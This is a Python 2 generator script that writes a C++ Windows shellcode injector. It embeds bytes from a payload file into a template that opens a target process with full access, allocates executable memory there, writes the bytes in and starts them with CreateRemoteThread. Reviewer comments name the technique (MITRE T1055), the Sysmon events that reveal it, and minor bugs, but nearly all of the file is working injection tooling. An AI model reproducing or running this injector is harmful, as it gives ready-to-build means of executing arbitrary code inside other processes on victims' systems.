make-injector-cpp.py
import os
# Generator for injector.cpp. This is a Python 2 script: it relies on the
# print statement and on ord() over the characters of a byte string.
#
# It reads raw-bytes.bin from the current working directory and embeds every
# byte, unmodified, into the hexData[] array of the C++ template below, then
# writes the result to injector.cpp (relative path, so also the working
# directory). Both files carry the payload bytes and should be handled as
# sensitive artefacts.
#
# Reviewer notes on the generated program, as visible in the template:
#   * It opens the target PID with PROCESS_ALL_ACCESS, allocates a
#     PAGE_EXECUTE_READWRITE region with VirtualAllocEx, copies hexData in
#     with WriteProcessMemory and starts it with CreateRemoteThread. This is
#     the classic remote-thread process-injection sequence (MITRE ATT&CK
#     T1055). Cross-process full-access handles, RWX allocations in another
#     process and remote thread creation are the telemetry points defenders
#     monitor, e.g. Sysmon Event ID 10 (ProcessAccess) and Event ID 8
#     (CreateRemoteThread).
#   * The function is named inject_dll although it writes raw bytes, and
#     addr_loadlibrary is declared but never used.
#   * The process handle is not closed on the early-return error paths and
#     the thread handle in `ret` is never closed.
#
# Template placeholders: %d receives the byte count and %s the
# comma-separated hex literals. "%%" yields a literal '%' for the C printf
# calls and "\\n" yields the two characters '\' 'n' in the generated source.
INJECTOR_TEMPLATE = """// This file is auto-generated by make-injector-cpp.py.
#include <windows.h>
#include <stdio.h>
#define BASE_10 10
unsigned char hexData[%d] = { %s };
int inject_dll(DWORD pid) {
HANDLE proc;
LPVOID addr_mem, addr_loadlibrary;
HANDLE ret;
BOOL success;
printf("Attempting to inject shellcode.\\n");
// Open the target process with all permissions.
proc = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
if (!proc) { printf("OpenProcess failed, error: %%d\\n", GetLastError()); return -1; }
else printf("OpenProcess OK, handle: %%p.\\n", proc);
// Allocate memory in process space for shellcode.
addr_mem = (LPVOID)VirtualAllocEx(proc, 0, sizeof(hexData)+1, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!addr_mem) { printf("VirtualAllocEx failed: %%d\\n", GetLastError()); return -1; }
else printf("VirtualAllocEx OK, address = 0x%%p.\\n", addr_mem);
// Write in the shellcode.
success = WriteProcessMemory(proc, (LPVOID)addr_mem, hexData, sizeof(hexData), 0);
if (!success) { printf("WriteProcessMemory failed: %%d\\n", GetLastError()); return -1; }
else printf("WriteProcessMemory OK.\\n");
// Create thread in target pointed at shellcode.
ret = CreateRemoteThread(proc, 0, 0, (LPTHREAD_START_ROUTINE)addr_mem, 0, 0, 0);
if (!ret) { printf("CreateRemoteThread failed: %%d\\n", GetLastError()); return -1; }
else printf("CreateRemoteThread OK.\\n");
success = CloseHandle(proc);
if (!success) { printf("CloseHandle failed.\\n"); return -1; }
return 0;
}
int main(int argc, char **argv) {
const char syntax_str[] = "Syntax: injector.exe <target-pid>\\n";
if (argc < 2) {
printf(syntax_str);
return -1;
}
// Convert argument to PID (long int).
DWORD pid = strtol(argv[1], 0, BASE_10);
if (pid == 0) {
printf(syntax_str);
return -1;
}
// Inject.
int ret = inject_dll(pid);
if (ret != 0) {
printf("Injection failed.\\n");
return -1;
}
printf("Done.\\n");
return 0;
}
"""

payload_path = os.path.join(os.getcwd(), "raw-bytes.bin")

if not os.path.isfile(payload_path):
    # The input is expected to come from the companion script named in
    # the message below.
    print "[!] Unable to find raw-bytes.bin. Run make-raw-bytes.py first."
else:
    with open(payload_path, 'rb') as src:
        payload = src.read()

    # One C hex literal per input byte, e.g. "0x90, 0xc3" (constructed
    # sample values).
    hex_literals = ', '.join(hex(ord(ch)) for ch in payload)
    generated_source = INJECTOR_TEMPLATE % (len(payload), hex_literals)

    # Written relative to the working directory; an existing injector.cpp
    # is overwritten.
    with open("injector.cpp", 'wb') as dst:
        dst.write(generated_source)